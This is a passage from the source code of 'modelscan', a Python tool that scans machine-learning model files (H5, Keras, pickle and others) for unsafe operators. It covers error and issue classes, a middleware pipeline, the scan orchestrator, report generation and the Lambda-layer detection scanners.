str: 53 | return f"The following error was raised during a {self.scan_name} scan: \n{self.message}" 54 | 55 | def to_dict(self) -> Dict[str, str]: 56 | return { 57 | "category": self.name(), 58 | "description": self.message, 59 | "source": str(self.model.get_source()), 60 | } 61 | 62 | 63 | class DependencyError(ModelScanScannerError): 64 | @staticmethod 65 | def name() -> str: 66 | return "DEPENDENCY" 67 | 68 | 69 | class PathError(ErrorBase): 70 | path: Path 71 | 72 | def __init__( 73 | self, 74 | message: str, 75 | path: Path, 76 | ) -> None: 77 | super().__init__(message) 78 | self.path = path 79 | 80 | def __str__(self) -> str: 81 | return f"The following error was raised during scan of file {str(self.path)}: \n{self.message}" 82 | 83 | @staticmethod 84 | def name() -> str: 85 | return "PATH" 86 | 87 | def to_dict(self) -> Dict[str, str]: 88 | return { 89 | "category": self.name(), 90 | "description": self.message, 91 | "source": str(self.path), 92 | } 93 | 94 | 95 | class NestedZipError(PathError): 96 | @staticmethod 97 | def name() -> str: 98 | return "NESTED_ZIP" 99 | 100 | 101 | class PickleGenopsError(ModelScanScannerError): 102 | @staticmethod 103 | def name() -> str: 104 | return "PICKLE_GENOPS" 105 | 106 | 107 | class JsonDecodeError(ModelScanScannerError): 108 | @staticmethod 109 | def name() -> str: 110 | return "JSON_DECODE" 111 | -------------------------------------------------------------------------------- /modelscan/issues.py: -------------------------------------------------------------------------------- 1 | import abc 2 | import logging 3 | from enum import Enum 4 | from pathlib import Path 5 | from typing import Any, List, Union, Dict, Optional 6 | 7 | from collections import defaultdict 8 | 9 | from modelscan.settings import Property 10 | 11 | logger = logging.getLogger("modelscan") 12 | 13 | 14 | class IssueSeverity(Enum): 15 | LOW = 1 16 | MEDIUM = 2 17 | HIGH = 3 18 | CRITICAL = 4 19 | 20 | 21 | class IssueCode: 22 | UNSAFE_OPERATOR = Property("UNSAFE_OPERATOR", 1) 23 | 24 | 25 | class IssueDetails(metaclass=abc.ABCMeta): 26 | def __init__(self, scanner: str = "") -> None: 27 | self.scanner = scanner 28 | 29 | @abc.abstractmethod 30 | def output_lines(self) -> List[str]: 31 | raise NotImplementedError 32 | 33 | @abc.abstractmethod 34 | def output_json(self) -> Dict[str, str]: 35 | raise NotImplementedError 36 | 37 | 38 | class Issue: 39 | """ 40 | Defines properties of a issue 41 | """ 42 | 43 | def __init__( 44 | self, 45 | code: Property, 46 | severity: IssueSeverity, 47 | details: IssueDetails, 48 | ) -> None: 49 | """ 50 | Create a issue with given information 51 | 52 | :param code: Code of the issue from the issue code class. 53 | :param severity: The severity level of the issue from Severity enum. 54 | :param details: An implementation of the IssueDetails object. 55 | """ 56 | self.code = code 57 | self.severity = severity 58 | self.details = details 59 | 60 | def __eq__(self, other: Any) -> bool: 61 | if type(other) is not Issue: 62 | return False 63 | return ( 64 | self.code == other.code 65 | and self.severity == other.severity 66 | and self.details.module == other.details.module # type: ignore[attr-defined] 67 | and self.details.operator == other.details.operator # type: ignore[attr-defined] 68 | and str(self.details.source) == str(other.details.source) # type: ignore[attr-defined] 69 | and self.details.severity == other.severity # type: ignore[attr-defined] 70 | ) 71 | 72 | def __repr__(self) -> str: 73 | return str(self.severity) + str(self.details) 74 | 75 | def __hash__(self) -> int: 76 | return hash( 77 | str(self.code) 78 | + str(self.severity) 79 | + str(self.details.module) # type: ignore[attr-defined] 80 | + str(self.details.operator) # type: ignore[attr-defined] 81 | + str(self.details.source) # type: ignore[attr-defined] 82 | + str(self.details.severity) # type: ignore[attr-defined] 83 | ) 84 | 85 | def print(self) -> None: 86 | issue_description = self.code.name 87 | if self.code.value == IssueCode.UNSAFE_OPERATOR.value: 88 | issue_description = "Unsafe operator" 89 | else: 90 | logger.error("No issue description for issue code %s", self.code) 91 | 92 | print(f"\n{issue_description} found:") 93 | print(f" - Severity: {self.severity.name}") 94 | for output_line in self.details.output_lines(): 95 | print(f" - {output_line}") 96 | 97 | 98 | class Issues: 99 | all_issues: List[Issue] 100 | 101 | def __init__(self, issues: Optional[List[Issue]] = None) -> None: 102 | self.all_issues = [] if issues is None else issues 103 | 104 | def add_issue(self, issue: Issue) -> None: 105 | """ 106 | Add a single issue 107 | """ 108 | self.all_issues.append(issue) 109 | 110 | def add_issues(self, issues: List[Issue]) -> None: 111 | """ 112 | Add a list of issues 113 | """ 114 | self.all_issues.extend(issues) 115 | 116 | def group_by_severity(self) -> Dict[str, List[Issue]]: 117 | """ 118 | Group issues by severity. 119 | """ 120 | issues: Dict[str, List[Issue]] = defaultdict(list) 121 | for issue in self.all_issues: 122 | issues[issue.severity.name].append(issue) 123 | return issues 124 | 125 | 126 | class OperatorIssueDetails(IssueDetails): 127 | def __init__( 128 | self, 129 | module: str, 130 | operator: str, 131 | severity: IssueSeverity, 132 | source: Union[Path, str], 133 | scanner: str = "", 134 | ) -> None: 135 | super().__init__(scanner) 136 | self.module = module 137 | self.operator = operator 138 | self.source = source 139 | self.severity = severity 140 | self.scanner = scanner 141 | 142 | def output_lines(self) -> List[str]: 143 | return [ 144 | f"Description: Use of unsafe operator '{self.operator}' from module '{self.module}'", 145 | f"Source: {str(self.source)}", 146 | ] 147 | 148 | def output_json(self) -> Dict[str, str]: 149 | return { 150 | "description": f"Use of unsafe operator '{self.operator}' from module '{self.module}'", 151 | "operator": f"{self.operator}", 152 | "module": f"{self.module}", 153 | "source": f"{str(self.source)}", 154 | "scanner": f"{self.scanner}", 155 | "severity": f"{self.severity.name}", 156 | } 157 | 158 | def __repr__(self) -> str: 159 | return f"" 160 | -------------------------------------------------------------------------------- /modelscan/middlewares/__init__.py: -------------------------------------------------------------------------------- 1 | from modelscan.middlewares.format_via_extension import FormatViaExtensionMiddleware 2 | -------------------------------------------------------------------------------- /modelscan/middlewares/format_via_extension.py: -------------------------------------------------------------------------------- 1 | from .middleware import MiddlewareBase 2 | from modelscan.model import Model 3 | from typing import Callable 4 | 5 | 6 | class FormatViaExtensionMiddleware(MiddlewareBase): 7 | def __call__(self, model: Model, call_next: Callable[[Model], None]) -> None: 8 | extension = model.get_source().suffix 9 | formats = [ 10 | format 11 | for format, extensions in self._settings["formats"].items() 12 | if extension in extensions 13 | ] 14 | if len(formats) > 0: 15 | model.set_context("formats", model.get_context("formats") or [] + formats) 16 | 17 | call_next(model) 18 | -------------------------------------------------------------------------------- /modelscan/middlewares/middleware.py: -------------------------------------------------------------------------------- 1 | import abc 2 | from modelscan.model import Model 3 | from typing import Callable, Dict, Any, List 4 | import importlib 5 | 6 | 7 | class MiddlewareImportError(Exception): 8 | pass 9 | 10 | 11 | class MiddlewareBase(metaclass=abc.ABCMeta): 12 | _settings: Dict[str, Any] 13 | 14 | def __init__(self, settings: Dict[str, Any]): 15 | self._settings = settings 16 | 17 | @abc.abstractmethod 18 | def __call__( 19 | self, 20 | model: Model, 21 | call_next: Callable[[Model], None], 22 | ) -> None: 23 | raise NotImplementedError 24 | 25 | 26 | class MiddlewarePipeline: 27 | _middlewares: List[MiddlewareBase] 28 | 29 | def __init__(self) -> None: 30 | self._middlewares = [] 31 | 32 | @staticmethod 33 | def from_settings(middleware_settings: Dict[str, Any]) -> "MiddlewarePipeline": 34 | pipeline = MiddlewarePipeline() 35 | 36 | for path, params in middleware_settings.items(): 37 | try: 38 | (modulename, classname) = path.rsplit(".", 1) 39 | imported_module = importlib.import_module( 40 | name=modulename, package=classname 41 | ) 42 | 43 | middleware_class: MiddlewareBase = getattr(imported_module, classname) 44 | pipeline.add_middleware(middleware_class(params)) # type: ignore 45 | except Exception as e: 46 | raise MiddlewareImportError(f"Error importing middleware {path}: {e}") 47 | 48 | return pipeline 49 | 50 | def add_middleware(self, middleware: MiddlewareBase) -> "MiddlewarePipeline": 51 | self._middlewares.append(middleware) 52 | return self 53 | 54 | def run(self, model: Model) -> None: 55 | def runner(model: Model, index: int) -> None: 56 | if index < len(self._middlewares): 57 | self._middlewares[index](model, lambda model: runner(model, index + 1)) 58 | 59 | runner(model, 0) 60 | -------------------------------------------------------------------------------- /modelscan/model.py: -------------------------------------------------------------------------------- 1 | from pathlib import Path 2 | from typing import Union, Optional, IO, Dict, Any 3 | 4 | 5 | class ModelDataEmpty(ValueError): 6 | pass 7 | 8 | 9 | class Model: 10 | _source: Path 11 | _stream: Optional[IO[bytes]] 12 | _should_close_stream: bool # Flag to control closing of file 13 | _context: Dict[str, Any] 14 | 15 | def __init__(self, source: Union[str, Path], stream: Optional[IO[bytes]] = None): 16 | self._source = Path(source) 17 | self._stream = stream 18 | self._should_close_stream = stream is None # Only close if opened 19 | self._context = {"formats": []} 20 | 21 | def set_context(self, key: str, value: Any) -> None: 22 | self._context[key] = value 23 | 24 | def get_context(self, key: str) -> Any: 25 | return self._context.get(key) 26 | 27 | def open(self) -> "Model": 28 | if self._stream: 29 | return self 30 | 31 | self._stream = open(self._source, "rb") 32 | self._should_close_stream = True 33 | 34 | return self 35 | 36 | def close(self) -> None: 37 | # Only close the stream if we opened a file (not for IO[bytes] objects passed in) 38 | if self._stream and self._should_close_stream: 39 | self._stream.close() 40 | self._stream = None # Avoid double-closing 41 | self._should_close_stream = False # Reset the flag 42 | 43 | def __enter__(self) -> "Model": 44 | return self.open() 45 | 46 | def __exit__(self, exc_type, exc_value, traceback) -> None: # type: ignore 47 | self.close() 48 | 49 | def get_source(self) -> Path: 50 | return self._source 51 | 52 | def get_stream(self, offset: int = 0) -> IO[bytes]: 53 | if not self._stream: 54 | raise ModelDataEmpty("Model data is empty.") 55 | 56 | self._stream.seek(offset) 57 | return self._stream 58 | -------------------------------------------------------------------------------- /modelscan/modelscan.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import importlib 3 | 4 | from modelscan.settings import DEFAULT_SETTINGS 5 | 6 | from pathlib import Path 7 | from typing import List, Union, Dict, Any, Optional, Generator 8 | from datetime import datetime 9 | import zipfile 10 | 11 | from modelscan.error import ( 12 | ModelScanError, 13 | PathError, 14 | ErrorBase, 15 | ModelScanScannerError, 16 | NestedZipError, 17 | ) 18 | from modelscan.skip import ModelScanSkipped, SkipCategories 19 | from modelscan.issues import Issues, IssueSeverity 20 | from modelscan.scanners.scan import ScanBase 21 | from modelscan._version import __version__ 22 | from modelscan.tools.utils import _is_zipfile 23 | from modelscan.model import Model 24 | from modelscan.middlewares.middleware import MiddlewarePipeline, MiddlewareImportError 25 | 26 | logger = logging.getLogger("modelscan") 27 | 28 | 29 | class ModelScan: 30 | def __init__( 31 | self, 32 | settings: Dict[str, Any] = DEFAULT_SETTINGS, 33 | ) -> None: 34 | # Output 35 | self._issues = Issues() 36 | self._errors: List[ErrorBase] = [] 37 | self._init_errors: List[ModelScanError] = [] 38 | self._skipped: List[ModelScanSkipped] = [] 39 | self._scanned: List[str] = [] 40 | self._input_path: str = "" 41 | 42 | # Scanners 43 | self._scanners_to_run: List[ScanBase] = [] 44 | self._settings: Dict[str, Any] = settings 45 | self._load_scanners() 46 | self._load_middlewares() 47 | 48 | def _load_middlewares(self) -> None: 49 | try: 50 | self._middleware_pipeline = MiddlewarePipeline.from_settings( 51 | self._settings["middlewares"] or {} 52 | ) 53 | except MiddlewareImportError as e: 54 | logger.exception(e) 55 | self._init_errors.append(ModelScanError(f"Error loading middlewares: {e}")) 56 | 57 | def _load_scanners(self) -> None: 58 | for scanner_path, scanner_settings in self._settings["scanners"].items(): 59 | if ( 60 | "enabled" in scanner_settings.keys() 61 | and self._settings["scanners"][scanner_path]["enabled"] 62 | ): 63 | try: 64 | (modulename, classname) = scanner_path.rsplit(".", 1) 65 | imported_module = importlib.import_module( 66 | name=modulename, package=classname 67 | ) 68 | 69 | scanner_class: ScanBase = getattr(imported_module, classname) 70 | self._scanners_to_run.append(scanner_class) 71 | 72 | except Exception as e: 73 | logger.error("Error importing scanner %s", scanner_path) 74 | self._init_errors.append( 75 | ModelScanError( 76 | f"Error importing scanner {scanner_path}: {e}", 77 | ) 78 | ) 79 | 80 | def _iterate_models(self, model_path: Path) -> Generator[Model, None, None]: 81 | if not model_path.exists(): 82 | logger.error("Path %s does not exist", model_path) 83 | self._errors.append(PathError("Path is not valid", model_path)) 84 | 85 | files = [model_path] 86 | if model_path.is_dir(): 87 | logger.debug("Path %s is a directory", str(model_path)) 88 | files = [f for f in model_path.rglob("*") if Path.is_file(f)] 89 | 90 | for file in files: 91 | with Model(file) as model: 92 | yield model 93 | 94 | if not _is_zipfile(file, model.get_stream()): 95 | continue 96 | 97 | try: 98 | with zipfile.ZipFile(model.get_stream(), "r") as zip: 99 | file_names = zip.namelist() 100 | for file_name in file_names: 101 | with zip.open(file_name, "r") as file_io: 102 | file_name = f"{model.get_source()}:{file_name}" 103 | if _is_zipfile(file_name, data=file_io): 104 | self._errors.append( 105 | NestedZipError( 106 | "ModelScan does not support nested zip files.", 107 | Path(file_name), 108 | ) 109 | ) 110 | continue 111 | 112 | yield Model(file_name, file_io) 113 | except (zipfile.BadZipFile, RuntimeError) as e: 114 | logger.debug( 115 | "Skipping zip file %s, due to error", 116 | str(model.get_source()), 117 | exc_info=True, 118 | ) 119 | self._skipped.append( 120 | ModelScanSkipped( 121 | "ModelScan", 122 | SkipCategories.BAD_ZIP, 123 | f"Skipping zip file due to error: {e}", 124 | str(model.get_source()), 125 | ) 126 | ) 127 | 128 | def scan( 129 | self, 130 | path: Union[str, Path], 131 | ) -> Dict[str, Any]: 132 | self._issues = Issues() 133 | self._errors = [] 134 | self._errors.extend(self._init_errors) 135 | self._skipped = [] 136 | self._scanned = [] 137 | self._input_path = str(path) 138 | pathlib_path = Path().cwd() if path == "." else Path(path).absolute() 139 | model_path = Path(pathlib_path) 140 | 141 | all_paths: List[Path] = [] 142 | for model in self._iterate_models(model_path): 143 | self._middleware_pipeline.run(model) 144 | self._scan_source(model) 145 | all_paths.append(model.get_source()) 146 | 147 | if self._skipped: 148 | all_skipped_paths = [skipped.source for skipped in self._skipped] 149 | for path in all_paths: 150 | main_file_path = str(path).split(":")[0] 151 | 152 | if main_file_path == str(path): 153 | continue 154 | 155 | # If main container is skipped, we only add its content to skipped but not the file itself 156 | if main_file_path in all_skipped_paths: 157 | self._skipped = [ 158 | item for item in self._skipped if item.source != main_file_path 159 | ] 160 | 161 | continue 162 | 163 | return self._generate_results() 164 | 165 | def _scan_source( 166 | self, 167 | model: Model, 168 | ) -> bool: 169 | scanned = False 170 | for scan_class in self._scanners_to_run: 171 | scanner = scan_class(self._settings) # type: ignore[operator] 172 | 173 | try: 174 | scan_results = scanner.scan(model) 175 | except Exception as e: 176 | logger.error( 177 | "Error encountered from scanner %s with path %s: %s", 178 | scanner.full_name(), 179 | str(model.get_source()), 180 | e, 181 | ) 182 | self._errors.append( 183 | ModelScanScannerError( 184 | scanner.full_name(), 185 | str(e), 186 | model, 187 | ) 188 | ) 189 | continue 190 | 191 | if scan_results is not None: 192 | scanned = True 193 | logger.info( 194 | "Scanning %s using %s model scan", 195 | model.get_source(), 196 | scanner.full_name(), 197 | ) 198 | if scan_results.errors: 199 | self._errors.extend(scan_results.errors) 200 | elif scan_results.issues: 201 | self._scanned.append(str(model.get_source())) 202 | self._issues.add_issues(scan_results.issues) 203 | 204 | elif scan_results.skipped: 205 | self._skipped.extend(scan_results.skipped) 206 | else: 207 | self._scanned.append(str(model.get_source())) 208 | 209 | if not scanned: 210 | all_skipped_files = [skipped.source for skipped in self._skipped] 211 | if str(model.get_source()) not in all_skipped_files: 212 | self._skipped.append( 213 | ModelScanSkipped( 214 | "ModelScan", 215 | SkipCategories.SCAN_NOT_SUPPORTED, 216 | "Model Scan did not scan file", 217 | str(model.get_source()), 218 | ) 219 | ) 220 | 221 | return scanned 222 | 223 | def _generate_results(self) -> Dict[str, Any]: 224 | report: Dict[str, Any] = {} 225 | 226 | absolute_path = Path(self._input_path).absolute() 227 | if Path(self._input_path).is_file(): 228 | absolute_path = Path(absolute_path).parent 229 | 230 | issues_by_severity = self._issues.group_by_severity() 231 | total_issue_count = len(self._issues.all_issues) 232 | 233 | report["summary"] = {"total_issues_by_severity": {}} 234 | for severity in IssueSeverity: 235 | if severity.name in issues_by_severity: 236 | report["summary"]["total_issues_by_severity"][severity.name] = len( 237 | issues_by_severity[severity.name] 238 | ) 239 | else: 240 | report["summary"]["total_issues_by_severity"][severity.name] = 0 241 | 242 | report["summary"]["total_issues"] = total_issue_count 243 | report["summary"]["input_path"] = str(self._input_path) 244 | report["summary"]["absolute_path"] = str(absolute_path) 245 | report["summary"]["modelscan_version"] = __version__ 246 | report["summary"]["timestamp"] = datetime.now().isoformat() 247 | 248 | report["summary"]["scanned"] = {"total_scanned": len(self._scanned)} 249 | 250 | if self._scanned: 251 | scanned_files = [] 252 | for file_name in self._scanned: 253 | scanned_files.append( 254 | str(Path(file_name).relative_to(Path(absolute_path))) 255 | ) 256 | 257 | report["summary"]["scanned"]["scanned_files"] = scanned_files 258 | 259 | if self._issues.all_issues: 260 | report["issues"] = [ 261 | issue.details.output_json() for issue in self._issues.all_issues 262 | ] 263 | 264 | for issue in report["issues"]: 265 | issue["source"] = str( 266 | Path(issue["source"]).relative_to(Path(absolute_path)) 267 | ) 268 | else: 269 | report["issues"] = [] 270 | 271 | all_errors = [] 272 | if self._errors: 273 | for error in self._errors: 274 | error_information = error.to_dict() 275 | if "source" in error_information: 276 | error_information["source"] = str( 277 | Path(error_information["source"]).relative_to( 278 | Path(absolute_path) 279 | ) 280 | ) 281 | 282 | all_errors.append(error_information) 283 | 284 | report["errors"] = all_errors 285 | 286 | report["summary"]["skipped"] = {"total_skipped": len(self._skipped)} 287 | 288 | all_skipped_files = [] 289 | if self._skipped: 290 | for skipped_file in self._skipped: 291 | skipped_file_information = {} 292 | skipped_file_information["category"] = str(skipped_file.category.name) 293 | skipped_file_information["description"] = str(skipped_file.message) 294 | skipped_file_information["source"] = str( 295 | Path(skipped_file.source).relative_to(Path(absolute_path)) 296 | ) 297 | all_skipped_files.append(skipped_file_information) 298 | 299 | report["summary"]["skipped"]["skipped_files"] = all_skipped_files 300 | 301 | return report 302 | 303 | def is_compatible(self, path: str) -> bool: 304 | # Determines whether a file path is compatible with any of the available scanners 305 | if Path(path).suffix in self._settings["supported_zip_extensions"]: 306 | return True 307 | for scanner_path, scanner_settings in self._settings["scanners"].items(): 308 | if ( 309 | "supported_extensions" in scanner_settings.keys() 310 | and Path(path).suffix 311 | in self._settings["scanners"][scanner_path]["supported_extensions"] 312 | ): 313 | return True 314 | 315 | return False 316 | 317 | def generate_report(self) -> Optional[str]: 318 | reporting_module = self._settings["reporting"]["module"] 319 | report_settings = self._settings["reporting"]["settings"] 320 | 321 | scan_report = None 322 | try: 323 | (modulename, classname) = reporting_module.rsplit(".", 1) 324 | imported_module = importlib.import_module( 325 | name=modulename, package=classname 326 | ) 327 | 328 | report_class = getattr(imported_module, classname) 329 | scan_report = report_class.generate(scan=self, settings=report_settings) 330 | 331 | except Exception as e: 332 | logger.error("Error generating report using %s: %s", reporting_module, e) 333 | self._errors.append( 334 | ModelScanError(f"Error generating report using {reporting_module}: {e}") 335 | ) 336 | 337 | return scan_report 338 | 339 | @property 340 | def issues(self) -> Issues: 341 | return self._issues 342 | 343 | @property 344 | def errors(self) -> List[ErrorBase]: 345 | return self._errors 346 | 347 | @property 348 | def scanned(self) -> List[str]: 349 | return self._scanned 350 | 351 | @property 352 | def skipped(self) -> List[ModelScanSkipped]: 353 | return self._skipped 354 | -------------------------------------------------------------------------------- /modelscan/reports.py: -------------------------------------------------------------------------------- 1 | import abc 2 | import logging 3 | import json 4 | from typing import Optional, Dict, Any 5 | 6 | from rich import print 7 | 8 | from modelscan.modelscan import ModelScan 9 | from modelscan.issues import IssueSeverity 10 | 11 | logger = logging.getLogger("modelscan") 12 | 13 | 14 | class Report(metaclass=abc.ABCMeta): 15 | """ 16 | Abstract base class for different reporting modules. 17 | """ 18 | 19 | def __init__(self) -> None: 20 | pass 21 | 22 | @staticmethod 23 | def generate( 24 | scan: ModelScan, 25 | settings: Dict[str, Any] = {}, 26 | ) -> Optional[str]: 27 | """ 28 | Generate report for the given codebase. 29 | Derived classes must provide implementation of this method. 30 | 31 | :param issues: Instance of Issues object 32 | 33 | :param errors: Any errors that occurred during the scan. 34 | """ 35 | raise NotImplementedError 36 | 37 | 38 | class ConsoleReport(Report): 39 | @staticmethod 40 | def generate( 41 | scan: ModelScan, 42 | settings: Dict[str, Any] = {}, 43 | ) -> None: 44 | issues_by_severity = scan.issues.group_by_severity() 45 | print("\n[blue]--- Summary ---") 46 | total_issue_count = len(scan.issues.all_issues) 47 | if total_issue_count > 0: 48 | print(f"\nTotal Issues: {total_issue_count}") 49 | print("\nTotal Issues By Severity:\n") 50 | for severity in IssueSeverity: 51 | if severity.name in issues_by_severity: 52 | print( 53 | f" - {severity.name}: {len(issues_by_severity[severity.name])}" 54 | ) 55 | else: 56 | print(f" - {severity.name}: [green]0") 57 | 58 | print("\n[blue]--- Issues by Severity ---") 59 | for issue_keys in issues_by_severity.keys(): 60 | print(f"\n[blue]--- {issue_keys} ---") 61 | for issue in issues_by_severity[issue_keys]: 62 | issue.print() 63 | else: 64 | print("\n[green] No issues found! 🎉") 65 | 66 | if len(scan.errors) > 0: 67 | print("\n[red]--- Errors --- ") 68 | for index, error in enumerate(scan.errors): 69 | print(f"\nError {index+1}:") 70 | print(str(error)) 71 | 72 | if len(scan.skipped) > 0: 73 | print("\n[blue]--- Skipped --- ") 74 | print( 75 | f"\nTotal skipped: {len(scan.skipped)} - run with --show-skipped to see the full list." 76 | ) 77 | if settings["show_skipped"]: 78 | print("\nSkipped files list:\n") 79 | for file_name in scan.skipped: 80 | print(str(file_name)) 81 | 82 | 83 | class JSONReport(Report): 84 | @staticmethod 85 | def generate( 86 | scan: ModelScan, 87 | settings: Dict[str, Any] = {}, 88 | ) -> None: 89 | report: Dict[str, Any] = scan._generate_results() 90 | if not settings.get("show_skipped"): 91 | del report["summary"]["skipped"] 92 | 93 | print(json.dumps(report)) 94 | 95 | output = settings.get("output_file") 96 | if output: 97 | with open(output, "w") as outfile: 98 | json.dump(report, outfile) 99 | -------------------------------------------------------------------------------- /modelscan/scanners/__init__.py: -------------------------------------------------------------------------------- 1 | from modelscan.scanners.h5.scan import H5LambdaDetectScan 2 | from modelscan.scanners.pickle.scan import ( 3 | PickleUnsafeOpScan, 4 | NumpyUnsafeOpScan, 5 | PyTorchUnsafeOpScan, 6 | ) 7 | from modelscan.scanners.saved_model.scan import ( 8 | SavedModelScan, 9 | SavedModelLambdaDetectScan, 10 | SavedModelTensorflowOpScan, 11 | ) 12 | from modelscan.scanners.keras.scan import KerasLambdaDetectScan 13 | -------------------------------------------------------------------------------- /modelscan/scanners/h5/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/modelscan/scanners/h5/__init__.py -------------------------------------------------------------------------------- /modelscan/scanners/h5/scan.py: -------------------------------------------------------------------------------- 1 | import json 2 | import logging 3 | from typing import List, Optional, Dict, Any 4 | 5 | 6 | try: 7 | import h5py 8 | 9 | h5py_installed = True 10 | except ImportError: 11 | h5py_installed = False 12 | 13 | from modelscan.error import ( 14 | DependencyError, 15 | JsonDecodeError, 16 | ) 17 | from modelscan.skip import ModelScanSkipped, SkipCategories 18 | from modelscan.scanners.scan import ScanResults 19 | from modelscan.scanners.saved_model.scan import SavedModelLambdaDetectScan 20 | from modelscan.model import Model 21 | from modelscan.settings import SupportedModelFormats 22 | 23 | logger = logging.getLogger("modelscan") 24 | 25 | 26 | class H5LambdaDetectScan(SavedModelLambdaDetectScan): 27 | def scan( 28 | self, 29 | model: Model, 30 | ) -> Optional[ScanResults]: 31 | if SupportedModelFormats.KERAS_H5.value not in [ 32 | format_property.value for format_property in model.get_context("formats") 33 | ]: 34 | return None 35 | 36 | dep_error = self.handle_binary_dependencies() 37 | if dep_error: 38 | return ScanResults( 39 | [], 40 | [ 41 | DependencyError( 42 | self.name(), 43 | f"To use {self.full_name()}, please install modelscan with h5py extras. `pip install 'modelscan[ h5py ]'` if you are using pip.", 44 | model, 45 | ) 46 | ], 47 | [], 48 | ) 49 | 50 | results = self._scan_keras_h5_file(model) 51 | if results: 52 | return self.label_results(results) 53 | 54 | return None 55 | 56 | def _scan_keras_h5_file(self, model: Model) -> Optional[ScanResults]: 57 | machine_learning_library_name = "Keras" 58 | if self._check_model_config(model): 59 | operators_in_model = self._get_keras_h5_operator_names(model) 60 | if operators_in_model is None: 61 | return None 62 | 63 | if "JSONDecodeError" in operators_in_model: 64 | return ScanResults( 65 | [], 66 | [ 67 | JsonDecodeError( 68 | self.name(), 69 | "Not a valid JSON data", 70 | model, 71 | ) 72 | ], 73 | [], 74 | ) 75 | return H5LambdaDetectScan._check_for_unsafe_tf_keras_operator( 76 | module_name=machine_learning_library_name, 77 | raw_operator=operators_in_model, 78 | model=model, 79 | unsafe_operators=self._settings["scanners"][ 80 | SavedModelLambdaDetectScan.full_name() 81 | ]["unsafe_keras_operators"], 82 | ) 83 | else: 84 | return ScanResults( 85 | [], 86 | [], 87 | [ 88 | ModelScanSkipped( 89 | self.name(), 90 | SkipCategories.MODEL_CONFIG, 91 | "Model Config not found", 92 | str(model.get_source()), 93 | ) 94 | ], 95 | ) 96 | 97 | def _check_model_config(self, model: Model) -> bool: 98 | with h5py.File(model.get_stream()) as model_hdf5: 99 | if "model_config" in model_hdf5.attrs.keys(): 100 | return True 101 | else: 102 | logger.error(f"Model Config not found in: {model.get_source()}") 103 | return False 104 | 105 | def _get_keras_h5_operator_names(self, model: Model) -> Optional[List[Any]]: 106 | # Todo: source isn't guaranteed to be a file 107 | 108 | with h5py.File(model.get_stream()) as model_hdf5: 109 | try: 110 | if "model_config" not in model_hdf5.attrs.keys(): 111 | return None 112 | 113 | model_config = json.loads(model_hdf5.attrs.get("model_config", {})) 114 | layers = model_config.get("config", {}).get("layers", {}) 115 | lambda_layers = [] 116 | for layer in layers: 117 | if layer.get("class_name", {}) == "Lambda": 118 | lambda_layers.append( 119 | layer.get("config", {}).get("function", {}) 120 | ) 121 | except json.JSONDecodeError as e: 122 | logger.error( 123 | f"Not a valid JSON data from source: {model.get_source()}, error: {e}" 124 | ) 125 | return ["JSONDecodeError"] 126 | 127 | if lambda_layers: 128 | return ["Lambda"] * len(lambda_layers) 129 | 130 | return [] 131 | 132 | def handle_binary_dependencies( 133 | self, settings: Optional[Dict[str, Any]] = None 134 | ) -> Optional[str]: 135 | if not h5py_installed: 136 | return DependencyError.name() 137 | return None 138 | 139 | @staticmethod 140 | def name() -> str: 141 | return "hdf5" 142 | 143 | @staticmethod 144 | def full_name() -> str: 145 | return "modelscan.scanners.H5LambdaDetectScan" 146 | -------------------------------------------------------------------------------- /modelscan/scanners/keras/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/modelscan/scanners/keras/__init__.py -------------------------------------------------------------------------------- /modelscan/scanners/keras/scan.py: -------------------------------------------------------------------------------- 1 | import json 2 | import zipfile 3 | import logging 4 | from typing import List, Optional 5 | 6 | 7 | from modelscan.error import DependencyError, ModelScanScannerError, JsonDecodeError 8 | from modelscan.skip import ModelScanSkipped, SkipCategories 9 | from modelscan.scanners.scan import ScanResults 10 | from modelscan.scanners.saved_model.scan import SavedModelLambdaDetectScan 11 | from modelscan.model import Model 12 | from modelscan.settings import SupportedModelFormats 13 | 14 | 15 | logger = logging.getLogger("modelscan") 16 | 17 | 18 | class KerasLambdaDetectScan(SavedModelLambdaDetectScan): 19 | def scan(self, model: Model) -> Optional[ScanResults]: 20 | if SupportedModelFormats.KERAS.value not in [ 21 | format_property.value for format_property in model.get_context("formats") 22 | ]: 23 | return None 24 | 25 | dep_error = self.handle_binary_dependencies() 26 | if dep_error: 27 | return ScanResults( 28 | [], 29 | [ 30 | DependencyError( 31 | self.name(), 32 | f"To use {self.full_name()}, please install modelscan with tensorflow extras. `pip install 'modelscan[ tensorflow ]'` if you are using pip.", 33 | model, 34 | ) 35 | ], 36 | [], 37 | ) 38 | 39 | try: 40 | with zipfile.ZipFile(model.get_stream(), "r") as zip: 41 | file_names = zip.namelist() 42 | for file_name in file_names: 43 | if file_name == "config.json": 44 | with zip.open(file_name, "r") as config_file: 45 | model = Model( 46 | f"{model.get_source()}:{file_name}", config_file 47 | ) 48 | return self.label_results( 49 | self._scan_keras_config_file(model) 50 | ) 51 | except zipfile.BadZipFile as e: 52 | return ScanResults( 53 | [], 54 | [], 55 | [ 56 | ModelScanSkipped( 57 | self.name(), 58 | SkipCategories.BAD_ZIP, 59 | f"Skipping zip file due to error: {e}", 60 | f"{model.get_source()}:{file_name}", 61 | ) 62 | ], 63 | ) 64 | 65 | # Added return to pass the failing mypy test: Missing return statement 66 | return ScanResults( 67 | [], 68 | [ 69 | ModelScanScannerError( 70 | self.name(), 71 | "Unable to scan .keras file", # Not sure if this is a representative message for ModelScanError 72 | model, 73 | ) 74 | ], 75 | [], 76 | ) 77 | 78 | def _scan_keras_config_file(self, model: Model) -> ScanResults: 79 | machine_learning_library_name = "Keras" 80 | 81 | # if self._check_json_data(source, config_file): 82 | 83 | try: 84 | operators_in_model = self._get_keras_operator_names(model) 85 | except json.JSONDecodeError as e: 86 | logger.error( 87 | f"Not a valid JSON data from source: {model.get_source()}, error: {e}" 88 | ) 89 | 90 | return ScanResults( 91 | [], 92 | [ 93 | JsonDecodeError( 94 | self.name(), 95 | "Not a valid JSON data", 96 | model, 97 | ) 98 | ], 99 | [], 100 | ) 101 | 102 | if operators_in_model: 103 | return KerasLambdaDetectScan._check_for_unsafe_tf_keras_operator( 104 | module_name=machine_learning_library_name, 105 | raw_operator=operators_in_model, 106 | model=model, 107 | unsafe_operators=self._settings["scanners"][ 108 | 